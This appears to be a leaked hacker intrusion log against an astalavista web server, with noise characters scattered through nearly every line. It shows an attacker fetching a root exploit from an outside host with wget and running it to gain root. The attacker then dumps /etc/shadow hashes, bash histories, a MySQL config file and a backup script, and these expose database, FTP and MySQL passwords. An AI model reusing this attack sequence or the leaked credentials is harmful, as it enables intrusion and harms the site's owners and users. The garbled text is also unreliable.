) v2 b# [& j& v" ]! ?: H: AThose so called “security professionals” who charge you $6.66 / month to
3 K; P- F! K( j' [; Nregister at their hack-proof portal, save your passwords in plaintext…9 d9 D( M: [" Z2 ^
brilliant!$ x, G2 w5 y$ ^. U: b+ W: S) P

! g: Z& I" E9 G" C6 v[~] This been fun but we want more.7 |* p1 N: `( G8 s, }9 i$ k
3 u# A* i/ p& W# d
sh-3.2$ uname -a$ l2 |+ R! z3 b: f
Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
1 J/ x. H/ n6 L- @; k/ ]sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]
$ K; A/ u+ S! q–13:33:37–  链接标记[url]http://anti.sec.labs/g0troot[/url]( q3 P7 f1 k6 y5 E
Resolving anti.sec.labs… 13.33.33.37
% q/ Z: d/ V9 [# w- R, EConnecting to anti.sec.labs|13.33.33.37|:80… connected.( m, L# w4 C, ?' H; ^5 u
HTTP request sent, awaiting response… 200 OK. `- ~- t  A0 B  V; g' B' ?. T
Length: 18200 (18K) [text/plain]
, l5 b6 `/ [3 x' X( g! `7 PSaving to: `g0troot’
% V. E  v5 }8 p: L/ d
  l# j  c, E3 ~* h% X100%[=========================================================================================================================================>] 18,200      58.6K/s   in9 \. Y" e4 B. J0 @
0.3s# r2 Z& j% _: |$ Y
( h9 d2 f) a0 J
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200]  o1 W& }$ K! H0 Q$ G* W6 D

# z6 o# h/ }7 L- Y2 xsh-3.2$ ./g0troot -i x86_64( O# O6 _: ?4 g9 c2 X
[+] g0troot - anti.sec.labs, w: g# M3 S4 D* T+ I& H
[+] Target: 2.6.18-128.1.10.el5
$ m4 A7 D( j. k0 }+ E[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
4 n1 \8 ?+ ?7 F6 \/ D$ u8 Q# z0 a. ^1 w5 R8 k6 b- ]1 A2 c
[+] r00tr00t
7 I9 X) {$ r% |, i+ P[~] Executing shell…; s8 d5 |' |7 J5 p+ u) M
* ~0 L9 f! N4 t+ O# F( N
sh-3.2# id
4 {6 S4 z1 P) \7 d) H7 t9 Luid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
0 j4 w- u! w1 @8 d
: h6 z& a+ d1 A. M' Ush-3.2# cat /etc/shadow
% J) a- d0 x: P! {% [root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::. ]+ L  N8 k9 m% s7 i# y3 V2 ?
[snip]8 `$ o, \' G3 B0 O+ @
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
4 l* E7 N* n6 O+ A) @9 V! Ujon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
; F9 v, }& O8 }! Z# k  R' ccom1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::7 U( {3 x2 {8 v9 m! s9 U9 M. Y
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
7 P2 p, w7 e, a( d# n2 ?( h& A$ F; N, L; u
sh-3.2# cat /etc/motd& g0 |! C* z& Y3 }+ D5 E
#####################################################) S2 k' y& x+ |  T, [
#____ ____ ___ ____ _    ____ _  _ _ ____ ___ ____  #% f: n, N# N* ^; j) y. p# J
# |__| [__   |  |__| |    |__| |  | | [__   |  |__| #! v/ b- Z) q! Q( n2 _) J
# |  | ___]  |  |  | |___ |  |  \/  | ___]  |  |  | #* H) n: L" {. H! y# t5 l) C9 k
#                                                   #6 r/ F5 [/ \" s( j3 R' w
#####################################################
# Z! w- t2 m0 t#                                                   #1 |6 A' h0 b# H! r
# Admin Contact - 链接标记support@secureservertech.com      #5 Z3 W0 G0 Z' ^3 Z
#                                                   ## n9 a- a  }! G* K8 k
# Available ShortCuts                               #- l: \! t" T: B2 y
#                                                   #- K8 \" E, ~' j& p
# nst -  list active connections                    #) n5 W0 I& c& [
# ddos - shows how many times each ip is connected  #8 Z: m% v+ t; b( \
# ltr -  restart the webserver                      #
& \4 h8 D  h! t# phpc - edit the php config file                   #
: K  V5 o$ i: N% u; k& Z# htc -  edit the webserver configuration file      #( V: q: k+ a. v/ p8 U& Z
# up -   uptime                                     #
1 L4 B* ]/ b4 q9 |: M# etd - edit the motd of the day file               #  a; A/ y' Y5 ]0 w7 r7 {' n0 i/ x
# htr - start and restart apache if needed          #
6 t" ~5 L3 |2 |0 U6 E# syng - shows active SYN_RECV connections          #
. U& c5 K7 p$ X( @* o: b  G# synd - syn flood blocker - “synd -h” for usage    #
& A+ i# m; a" X- E  x#####################################################
2 n- z: T' Y) u- b  r- F, @* z; ^# NOTES:                                            #
1 `. I9 M' R5 N- O# Last Upgrade - 12-08-2008 by JF                   #) d: m, I" Z0 r3 X( W
# My.cnf/Mysql Optimization - 1-28-09               ## K: D7 H1 A. |  `
#                                                   #
& M0 s) V7 B- h; X: k#                                                   #% N* C* q2 b0 p4 N! c, [5 S
#                                                   #
7 P1 `- T8 m9 r#####################################################8 b& \7 |6 z  T! N2 x

' e( }& h$ r$ I, Ash-3.2# lastlog | grep -v Never8 O4 Q2 b% G0 `0 y7 \
Username         Port     From             Latest3 U) T$ {/ m! S" Y: _
root             pts/1    adsl-194-162-fix Thu Jun  4 07:19:14 +0000 2009, }9 _6 U4 Z2 h6 `( G
admin            pts/1    cp.secureservert Thu Mar 20 10:25:39 +0000 2008& A$ \2 T. {0 K& V5 B& U+ ?/ m
com              pts/0    cust.static.212- Tue Jun  2 07:46:30 +0000 2009
7 x. v1 D3 \4 W' d6 rastanet          pts/0    adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
# f- Z. `& ?% @& Z' m  h5 p7 q/ N3 F  ]" G" i: ]8 x; Z
sh-3.2# ls -la! d8 K& F) y1 G8 O
total 453376) F3 H6 h! Q1 P" {$ x" K- j1 a
drwxr-x— 15 root root       4096 Jun  4 08:40 .* ?8 F" P: f0 s- C" g$ `/ `
drwxr-xr-x 25 root root       4096 Jun  3 02:43 ..
8 N5 Z& _+ B% l/ k- Q' ]-rw-r–r–  1 root root    2394400 Oct 19  2007 10mbtest.zip$ s- H" Q  Z( P' g  f. R
-rw——-  1 root root       1006 Sep 11  2007 anaconda-ks.cfg
' `# O: J# T4 y5 Y2 |# T-rw——-  1 root root      16836 Jun  4 07:21 .bash_history( P' H. N+ o. V3 \. u0 W; H+ C
-rw-r–r–  1 root root         24 Jan  6  2007 .bash_logout$ e+ p  x3 r3 a
-rw-r–r–  1 root root        191 Jan  6  2007 .bash_profile/ K1 d% w/ {/ K# Z  u: l
-rw-r–r–  1 root root        176 Jan  6  2007 .bashrc4 F$ U3 n9 D, R. L9 b& P
-rwx——  1 root root       1899 Oct 28  2007 bk.sh* X7 j9 [0 Y7 f- F9 B
-rw-r–r–  1 root root       1327 Nov 29  2007 cert! o0 @8 M( u# R' u) H8 Q+ d
-rw-r–r–  1 root root  139860821 May 14  2008 contrexxbackup_20080514.sql, ^3 b2 ~2 @. [) O& j# _0 M& ]
drwxr-xr-x  4 root root       4096 May 20  2008 .cpan
! }2 q3 y3 V1 _" L' x9 G-rw-r–r–  1 root root        100 Jan  6  2007 .cshrc
$ R1 Q( ^+ V. ]" o% \-rw-r–r–  1 root root     323079 Mar 31 13:48 defaultp_ports.sql. h2 A+ W- t& J2 l0 K! g+ }
drwx——  2 root root       4096 Oct 28  2007 .elinks
& z8 \2 c9 @& i) m7 l8 B' [drwxr-xr-x 13 root root       4096 Mar 21  2008 gdb-6.7.1
5 _6 O: q4 x, {' G7 `: ?$ M-rw-r–r–  1 root root   15080950 Oct 29  2007 gdb-6.7.1.tar.bz2
" }3 n# v) f, w-rw——-  1 root root          0 Apr 16 13:19 .history) W& ~' j% M& I% J5 G* q- E/ ?
-rw-r–r–  1 root root      16095 Sep 11  2007 install.log" \* ~) [5 d' @: k$ {( F$ d
-rw-r–r–  1 root root       2566 Sep 11  2007 install.log.syslog6 M$ O2 s! k4 e4 f
-rw-r–r–  1 root root       1003 Jul 22  2007 install.sh  L0 Z5 i2 o: ~# u" c: ?: X9 o
-rw——-  1 root root         35 Jun  2 14:23 .lesshst- W. @9 r3 |3 Z! `% z" [6 c
drwxr-xr-x  2 root root       4096 Dec 29  2007 .lftp
& r7 X0 z7 R) kdrwxr-xr-x 10 root root       4096 Sep 14  2007 linux-2.6.19.2-grsec
7 `- h8 I2 x# [# i7 t4 t% z-rw-r–r–  1 root root   94979336 Feb 16  2007 linux-2.6.19.2-grsec.tar.gz
5 R1 l9 n/ n9 A7 t. `" b-rw-r–r–  1 root root    4737058 Sep 22  2007 linux-2.6.22.tar.bz2* h1 v. B" G/ }- D/ N6 g
-rwx——  1 root root        760 Sep 18  2008 lp
$ }4 ~1 c1 Q. u6 h+ w2 I8 Qdrwxr-xr-x 12 root root       4096 Nov 30  2007 lsws-3.3.1
+ B: `4 p8 [* c6 L2 Q$ m2 g! b-rw-r–r–  1 root root    2480045 Nov 30  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz$ ^9 ?7 v0 X$ y% k; X# S3 ]
-rw-r–r–  1 root root    6388501 Nov 29  2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1! M8 L9 o% z& j5 `* X- C# i" n3 C
drwxr-xr-x 12 root root       4096 Mar 21  2008 lsws-3.3.9; w: |" a5 G+ F3 a. V. ]
-rw-r–r–  1 root root    6437577 Mar 21  2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
% I4 a. v' Q- A/ ]/ Sdrwxr-xr-x 12 root root       4096 May 29 15:10 lsws-4.0.3( f3 R! i! @$ ~+ g+ J
-rw-r–r–  1 root root    6496050 May  8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz5 V4 P* B6 r: p; [- p
-rw-r–r–  1 root root      25316 Feb 15  2006 mybk.sh
! q0 M8 H3 d( T/ @  u  m-rw——-  1 root root         41 Oct 19  2007 .my.cnf4 ^  y. q$ S! T# u+ y$ p. b
-rw——-  1 root root       2902 Jun  4 08:40 .mysql_history( s+ J* _6 {+ u3 n
-rwx——  1 root root      38873 Apr 16  2008 mysqlreport
% J" x) s6 O/ {& l* _-rw——-  1 root root         41 May 20  2008 .mytop
. P  [. g. v  y/ {3 b$ Rdrwxr-xr-x  3 1000  1000      4096 May 20  2008 mytop-1.6
2 T8 r' J- G/ i$ Z4 w! F) z-rw-r–r–  1 root root      19720 Feb 17  2007 mytop-1.6.tar.gz! ]' A. B& r3 J) z& ]
drwxr-xr-x  2 root root       4096 Oct 28  2007 .ncftp9 n1 T7 Q  f" |  {6 e
-rw——-  1 root root       1462 Sep 21  2007 opt.php
( y4 N1 k' v- h% f" q7 U6 l-rw-r–r–  1 root root       3371 Sep 22  2007 p" s& L; O7 r& ~# Z& ]2 a- @
-rw-r–r–  1 root root    7608429 Aug 30  2007 php-5.2.4.tar.bz2
7 G: n0 L) a7 W" g-rw——-  1 root root       1024 Feb  3 21:32 .rnd
4 }& F$ U- R) Q- S% C-rw-r–r–  1 root root        716 Nov 28  2007 server.csr8 ~: X, a) X2 N4 c, a9 p' t
-rw-r–r–  1 root root        887 Nov 28  2007 server.key
5 C/ \! Q& |4 H. z( q, Y5 L( sdrwx——  2 root root       4096 Oct 10  2008 .ssh
# h9 P5 P$ u5 G( M; f; G* B-rw-r–r–  1 root root      44227 Oct 28  2007 tar-inc-backup.dat
' x+ M7 s; x8 `$ h" ?-rw-r–r–  1 root root        129 Jan  6  2007 .tcshrc
  y5 C( c! z( e+ T-rw-r–r–  1 root root  104874307 Oct 17  2007 test100.zip
  Z7 ~; C2 |: J-rw-r–r–  1 root root   67085540 Oct 19  2007 test100.zip.13 _1 q8 s: x; c# a' M" ]" D
drwxr-xr-x  2 root root       4096 Apr 29 11:15 tmp
9 I, i2 ~2 W6 g-rw-r–r–  1 root root      42596 May 21  2007 tuning-primer.sh
, p! S% F/ E$ J. t+ t; w0 Sdrwxrwxrwx 19 1000 users      4096 Mar 21  2008 valgrind-3.3.0
0 f- G' o8 k: N! y! O) x-rw-r–r–  1 root root    4519551 Dec 11  2007 valgrind-3.3.0.tar.bz2
  `* |) s9 i: ^6 M0 E6 K8 O+ f-rw——-  1 root root      12997 May 16  2008 .viminfo
4 P* n  N- r) Y. C3 \: A
, Z" R' l  C+ c7 C4 Ush-3.2# cat .bash_history0 a1 e- c1 ~2 B. d
[snip]7 |6 y: W- F/ g, ?& r% x7 H% E
wget cp4sst.com/sstlinux.tar.gz
4 A! l* z) ]: I4 h. ytar zxvf sstlinux.tar.gz
: t1 d4 f3 m2 T+ t6 |cd linux-2.6.27.10. X+ h) B$ X- B8 _' n
sh install.sh
7 Z1 Z' H; G7 h1 T/ `6 ]make bzImage ; make modules ; make modules_install ; make install! H1 \. R" r9 I, v2 m" v
make clean# e1 I, o9 F1 J/ U& Y
service mysqld restart9 Z& R; p5 r! `; f6 i
[snip]1 u+ Q( Q  M; N. x: X
cd /usr/sbin// E1 o% K. N- m3 K$ d( [
chmod 4777 traceroute, v  b: x% H* U. O! H- G
chmod 4777 ping' b0 J6 Y  Z6 N! h
traceroute -I 链接标记[url]www.astalavista.ch[/url]
( z% V7 Q( |' o3 x[snip]
% c6 U  ~! l8 O* [3 Ovi /etc/csf/csf.conf0 y, c5 ?" K3 L0 w) ~* f1 z
traceroute google.ch
8 L1 c! J# b7 k+ O9 q1 l+ Nservice csf restart
- I3 X" ^' j7 B7 d& K3 ]) {' ptracert google.ch
3 O1 `% x2 `) n0 W5 D1 U" G7 [service csf restart
& I; x- P6 d  I$ X9 j. G4 ~* utraceroute 链接标记[url]www.google.ch[/url]
+ r) v1 M3 Q" K3 p8 B# wtracert 链接标记[url]www.google.ch[/url]
- f5 p" l+ l: |) K3 T% _; b2 [traceroute 链接标记[url]www.google.ch[/url]
- }3 D( A, V' C! ^( d% T% n6 q" Olocate traceroute" l  n! D; C5 @0 \, f
chown 4755 /bin/traceroute/ N$ R% t2 U  ^6 Y
chown 4777 /bin/traceroute7 X2 B) g) U6 Z& }. m
locate ping
) R" L/ e# n+ ?4 a$ G0 }$ T2 s1 `, vchown 4755 /bin/ping
1 ?) t( V% D8 i- nchown 4777 /bin/ping
3 R, O5 N$ J/ |: p: s1 x. hcd /bin/) o2 h9 l, l' p# w6 V: D# {8 I
ls -ali | grep ping
, |  `: j) D3 Q* t" uchown root ping5 r5 d2 A: j6 q5 J$ Q- r! a( t
chmod 4755 ping
/ H( r# N/ w; U; X9 y* Zls -ali | grep traceroute
) c& ^4 E( }, {chown root traceroute( ~% m1 w  K: X% L* P8 B
chmod 4755 traceroute* m  T# O  b7 w
ls -ali | grep traceroute9 V: x) E* K# ~
traceroute -I 链接标记[url]www.google.ch[/url]
; s  e! C1 G/ }9 ~& f2 T; atraceroute 链接标记[url]www.google.ch[/url]
/ i# n5 I' c2 V7 n# Owhois pmsantos.ch
7 B$ N, p. V) k: l8 C* ^' R[snip]7 q$ G# T  s) Y. l9 v" |( s
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
- \3 J' @# n. L0 ~! L: omysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql' k0 J' M  j" C
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql# ~* k4 X4 K+ j" T2 [" K' P* |
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
/ S, X4 }8 ^& A7 A. mtop
& J6 r3 C0 |/ L! X; Iping ssth.ch
/ t6 ^+ _9 u& Uping asdlkfaljgasd???ljg???lasj.ch) E4 o, g# e' E0 l) R0 b
ping asdlkfaljgasdlasj.ch2 Y& x( r# Z: x( B; V
ping 链接标记[url]www.ssth.ch[/url]; u3 J! y9 m* Q0 h8 G5 Z9 y: D
ping ssth.ch
- w+ Q3 x6 i# r; k# ?- \7 l5 B6 Ynslookup 链接标记[url]www.google.ch[/url]
4 [% h# j+ I  E* rnslookup 链接标记[url]www.ssth.ch[/url]( ?" A1 C( S, t' E5 p
man nslookup( w% h) j5 }% i+ X& i
ping 链接标记[url]www.google.ch[/url]
# |- N0 o0 L2 y* }3 D: vnslookup 链接标记[url]www.google.ch[/url]
/ Y& j; C0 Y( [/ P  U/ ^1 K+ Gnslookup 链接标记[url]www.google.ch[/url]
2 [3 l, L( f6 y2 }7 m- H* Hnslookup salfjasdlf.ch
; R+ B( {1 U: ~" b[snip]
# A5 O; S' D9 A" \openssl passwd -1 sadf
4 z% n  p9 X! i% p2 M8 Hopenssl passwd -1 5cZNHstdTy$ c9 l  `4 r5 x+ Y4 c7 E# w
mysql
* s$ I. q! N$ S  x& |mysql
* d; r0 s: d! v  }/ F; {locate proftp& A0 y$ k4 r; r, ]3 e
vi /etc/proftpd.passwd
! E4 R) Y( r! U* z9 \service proftpd restart
$ j& O6 T7 J4 h' Q; `locate proftpd.conf
2 D2 H& g+ ?9 G) {, |2 y+ lvi /etc/proftpd.conf
5 t  n* Z7 j5 u' uvi /etc/proftpd.passwd
8 X. h8 D6 ]4 z9 i' nservice proftpd restart: a5 z9 W9 W: T# }8 @9 G
[snip]
6 Q  G6 C# k6 T0 J" Z. x" b9 F; [. Q/bin/sh /home/com/backup_system/backup.sh
, P1 U. L9 c! L6 rtar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
9 ?) x1 ]1 v+ R( ~7 _! O$ Q0 Zmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql7 d% P0 w. \. u! j& h
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql8 _& V( A. d! S" e5 T
ls -ali1 d5 m# e  v6 h
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql: j$ y5 R0 @# k) _; j" ?8 H
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
& P4 d$ b8 o# pcrontab -l
: P! p% e" ^7 F3 Ocrontab -l
3 Q+ b9 L9 j- U0 N3 P- Z3 M' Cphp -q /home/com/public_html/modifications/cronjobs/securitynews.php
& }4 t2 \. E% |% @. m/home/com/public_html/modifications/cronjobs/exploits.sh
  e0 e4 O2 d- v! _8 W( c; Swget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
4 U6 r1 W- S* N. h% ~+ D/ d& p$ }tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
( J3 V# K* J5 \3 y; Y& Ecd lsws-4.0.3
7 l/ f+ @8 l3 E  G% [' U- N, nsh install.sh# z! C$ H' e" T7 M' Z
uptime
9 Z" p7 @6 j  n- D# U5 W, bhdparm -tt /dev/sda" ?8 `$ ^7 @1 L3 T* e* B' D
iostat+ n. W; h0 H7 ~' W. h9 w
yum install iostat/ ]& Q4 b9 H2 a0 Q" s
iostat
1 O  S: [  S% D; n/ {2 Twhereis iostat- C; T- U/ x4 d" i* \
yjm clean all- f) J" \* ]; R- {
yum clean all ; yum -y update9 r& M! P8 F/ V6 a2 R: N4 L4 p
iostat$ f9 H% Q7 ?1 b& U4 g( y: W
yum install systat
0 i7 y& j& ~! V8 j- g$ T- L/ K! vrpm -qa | grep iostat+ [9 s7 M4 W$ L2 f4 e6 F
rpm -qa | grep sysstat3 o* d; n( L) t
rpm -qa | grep systat
$ [) O" b) o- B9 U6 ^dmesg -c
9 k& V4 e% p9 \7 {  C! V- K  i4 `1 isysctl -p
. I6 E" ~* G8 p9 Iuname -r
( o, t" j: a: @3 m( {cd /usr/src
6 p5 s' Q& ?$ l1 s+ a1 n- ewget nix101.com/kernels/sstlinux.tar.gz, o# s5 X. y$ r; e- C$ U. C
shutdown -r now
6 x1 `' Z5 v6 s  I' ~' h7 e" mnano -w /boot/grub/grub.conf
8 ~7 R0 c! ~3 s* o- Q# G8 v! `' e  Q( t, }  l! ~) t2 ^  H! ~! \
sh-3.2# cat .my.cnf; D0 b3 L3 U! N' C; S- C
[client]
$ d7 D8 k! E' U0 \4 [user=da_admin
, l; `( ]' Q% N7 o4 T" ~password=X9dctmRH
' W3 b3 K0 Y  o) X' t3 b& h* z, I; D' @- l; j8 h% o2 q& r$ W5 e
sh-3.2# cat /home/com/backup_system/backup.sh- ]* V2 V" j8 A) a, [3 \
#!/bin/sh
+ _6 ~- U8 C% X) Z#####################################################################
1 C. F! m' a2 O% q$ R  f& q#                                                                   #
" S* z: u) ~3 d#   incremental backup for astalavista.com                          #2 w4 g' T8 r; ~4 Q0 X" X
#                                                                   #
8 A% `, L, [. ]  d8 p' N8 ?#   author:    Paulo M. Santos <链接标记paulo.santos@astalavista.com>       #
/ E  L$ W- M5 j0 t+ @$ W/ g2 D# W% B#                                                                   #
- f' Q5 t2 R$ ~: g+ H1 a#####################################################################
. R; R; Z* m3 l' p9 g2 S[snip]* I% y. r& @, w( d
PROG_DIR=”/home/com/backup_system”;( Y- X3 c3 ?; _; d% U
BACKUP_DIR=”/home/com/backups”;
0 @8 X( k' E' G; a0 y/ SDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;! T! S- A$ [$ }! U2 i6 N
# ftp for synology backup server' t) y" p3 L3 ^' I; e! x
FTP_HOST=”212.254.194.163″;
- i, O4 {; ]: ^. kFTP_PORT=”21″;& N$ p3 F% m. B! e% y  S5 U% K/ P
FTP_USER=”astalavista.com”;
: w, }' l5 z  J" e4 cFTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
) g* K0 b6 s% g- b9 g; Y. [6 |FTP_DIR=”/astalavista.com”;
6 i3 j1 _# b2 s, _3 t# database
2 u+ G- m2 }9 D" ?+ g  XDB_HOST=”localhost”;
# z) p) g* w9 C' eDB_USER=”contrexxuser2″;
+ D8 I! }( u) J* z" M1 HDB_PASS=”0fEYNZgXz1pKe”;
: h/ l3 P, v3 s/ L5 ]7 ~: ^DB_DATABASE1=”com_contrexx2_live”;
) P6 c+ H8 ^6 Z3 g" J  i$ j! IDB_DATABASE2=”com_contrexx2″;
# b- y4 m; R3 v$ }5 t& X  m[snip]
% p& o2 K4 B" m6 a: Nftp -in $FTP_HOST $FTP_PORT <<EOF
1 b" c: j4 z2 |& O& J, c/ V* pquote USER $FTP_USER* r; v2 P# Z# g) X- `) H
quote PASS $FTP_PASS
* B( Q2 b; C, Q2 b/ D& [7 ^+ d! {1 Ecd $FTP_DIR- u4 w; I2 {; D) Y3 n: H
put $DB_FULLNAME-SQL_Dump.tar8 @$ T; m; R" b& D
put $BACKUP_FULLNAME-Public_HTML.tar) p( L, W# R* {4 g3 l
close
* s/ Y( A3 _3 G% z3 V0 Ubye
8 J% h2 c0 @4 B$ WEOF
* \: }; o/ y8 s. L1 m. p. @9 p9 E/ }& S8 U) b2 m4 i5 B! d1 O8 H' P& l% A% w3 [
sh-3.2# cd /home
/ N/ n- J( K" j% l6 \sh-3.2# ls -la1 P7 v+ n7 j0 ~! H. t" R
total 120* B" C* e" n7 g* ]' g4 N
drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
1 I% F1 c2 S3 h2 ndrwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..* u/ n7 e, l" k0 M
drwx–x–x  9 admin   admin    4096 Nov 28  2007 admin
; U9 ?& S: n1 F- U$ }0 b-rw——-  1 root    root     8192 Jun  4 03:03 aquota.group; `0 H: D. h) F$ O# v8 _
-rw——-  1 root    root     8192 Jun  3 02:45 aquota.user
& l2 T. l5 f# ]4 e9 \. Q/ udrwx–x–x  6 astanet astanet  4096 Jun  4 09:51 astanet
( D! I$ h* W; w$ e- Qdrwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
4 f9 {: c$ ~5 ^drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.141617 P8 u3 E3 d3 V* f! v8 C# h! r
drwx–x–x 10 com     com      4096 Apr 28 12:40 com
" {! ^- T$ e: t9 rdrwxr-xr-x  2 root    root     4096 May 17  2007 ftp( K0 z$ G( f0 {. u. k" O/ ?3 W
drwx——  3 jon     jon      4096 Sep 21  2007 jon
2 t* s" g8 B: bdrwx——  2 root    root    16384 Sep 11  2007 lost+found
8 j0 \# }6 ^& R$ ydrwxr-xr-x  2 root    root     4096 Sep 14  2007 my9 M( h% d  m2 n5 B7 G# k
drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
7 f, b1 q+ ~* @' K: Gdrwx——  2 jon     jon      4096 Sep 15  2007 test1 s: P# K% C6 x( \& R9 ?
drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp  D& o' [( x/ C9 N
  G5 N5 ^: z2 l# }" z6 F0 l
sh-3.2# cd admin
: o; F9 `# l. @) X6 j: ]% p7 y! Nsh-3.2# ls -la
* h4 F0 H8 l/ X& q/ ~total 1735896) V; q3 s! S5 ?5 }
drwx–x–x  9 admin admin       4096 Nov 28  2007 .( a. ^7 z0 L/ _, f9 U5 X
drwxr-xr-x 14 root  root        4096 Mar 11 17:56 ..
, e$ k* ]$ V  x, j  W0 Adrwxrwxr-x  2 admin admin       4096 Oct 25  2007 admin_backups: K! N+ j7 J4 Z  K- d
drwx——  2 admin admin       4096 Sep 28  2007 backups- t  w# K$ }7 l6 h: p, X% ?
-rw——-  1 admin admin        860 Sep 17  2008 .bash_history
7 N7 o" S" V1 W-rw-r–r–  1 admin admin         24 Sep 14  2007 .bash_logout
/ N* T# `( d& k7 c-rw-r–r–  1 admin admin        176 Sep 14  2007 .bash_profile
4 a; R: h0 t) H) G" S5 u-rw-r–r–  1 admin admin        124 Sep 14  2007 .bashrc
/ f/ o1 S4 I- B  |drwxr-xr-x  2 root  root        4096 Sep 28  2007 com_backups+ f3 E. J) ?7 n$ J9 I: L, g3 Q+ A
drwx–x–x  6 admin admin       4096 Sep 21  2007 domains, l4 \( |7 Q& I
drwxrwx—  3 admin mail        4096 Sep 21  2007 imap0 D. h2 F6 o* `2 N: K( K- H6 H- {
-rw-r–r–  1 root  root          24 Sep 21  2007 info.php' O' e6 }2 t" W2 D
drwx——  2 admin admin       4096 Sep 21  2007 mail
) v5 b3 G8 R" K-rw-r–r–  1 root  root         716 Nov 28  2007 server.csr
  l9 r0 F( f9 d-rw-r–r–  1 root  root         887 Nov 28  2007 server.key9 n+ Q$ Z6 b0 k( P
-rw-r—–  1 admin mail          34 Sep 14  2007 .shadow
# N: U, Z- r3 T% c3 l2 H9 @# ]$ |4 P- D-rw-r—–  1 admin com   1775711054 Oct 25  2007 user.admin.com.tar.gz
. C9 M  p: |# C+ {drwx–x–x  2 admin admin       4096 Jul 29  2008 user_backups
4 O2 t( |& {' n5 f+ I* y. ?
! D" R! _8 Z) k/ Jsh-3.2# ..
2 O2 c/ [' p5 y8 B" `6 ]sh-3.2# cd jon4 R) o9 a. x1 [
sh-3.2# ls -la
' [& F- ~" z. P2 i) Itotal 364 a' ?, p+ m. p; N+ E3 C/ |+ g! E
drwx——  3 jon  jon  4096 Sep 21  2007 .
9 s* b9 O" I( \( odrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
6 K# A6 Q( W! f2 O% z2 d-rw——-  1 jon  jon    53 Sep 21  2007 .bash_history
. Y& T/ ]6 g( f-rw-r–r–  1 jon  jon    24 Sep 21  2007 .bash_logout, r* V/ m' X2 R0 B9 Y' }
-rw-r–r–  1 jon  jon   176 Sep 21  2007 .bash_profile( k7 \  m2 F1 Q0 ], V0 _) X
-rw-r–r–  1 jon  jon   124 Sep 21  2007 .bashrc
4 q/ f7 z, `! [: H) K6 U" G# {; P-rw-r–r–  1 root root   24 Sep 21  2007 info.php
0 p0 n8 q' O1 B' |  e3 Gdrwxrwxr-x  2 jon  jon  4096 Sep 21  2007 public_html: i% I" j' |' s( v
* M* @; f  l0 Z0 }4 I+ j
sh-3.2# cd ... E( T1 n# c) V
sh-3.2# cd test
( Y9 y" K3 N& F% j+ E0 ssh-3.2# ls -la
% j  f$ Z# L) \' `3 ^total 48* C- s: w, l0 z) ?" Q6 a+ Q4 X
drwx——  2 jon  jon  4096 Sep 15  2007 .
! u9 A9 C8 t  e; Z6 Y  t. Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
( F. L* E# N  g; \& P-rw——-  1 jon  jon    79 Sep 21  2007 .bash_history
4 B( L- `! R. d& P7 y+ v-rw-r–r–  1 jon  jon    24 Sep 15  2007 .bash_logout% X: A3 v( c  y7 x
-rw-r–r–  1 jon  jon   176 Sep 15  2007 .bash_profile
! y; \% @& m- f0 y-rw-r–r–  1 jon  jon   124 Sep 15  2007 .bashrc
; H3 O% K9 l2 V9 |: C" X7 n; ~sh-3.2# cat .bash_history
: w, N- b8 x7 n& {4 w7 O1 z/usr/bin/mysqladmin -u root password PoliuJhytg67% I9 f# h7 y$ D  u9 K* E2 F

* ?% b! ^9 }( `& Y* \5 nsh-3.2# cd ..# e- R9 V5 A, w
sh-3.2# cd astanet
' C0 N6 R, y+ T- @" Wsh-3.2# ls -la
' B& q2 V  G% X$ H5 f; }/ c; \total 52
2 O: f8 `: k# u" Ydrwx–x–x  6 astanet astanet 4096 Jun  4 09:51 .# [" T/ N& s' t8 T
drwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..5 G: V7 u. Y( q% X; e
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth
6 R! C% U  V0 X: u& o# d* c7 s-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history* W; k) V8 Q& C) Q: u/ G8 m; U+ j
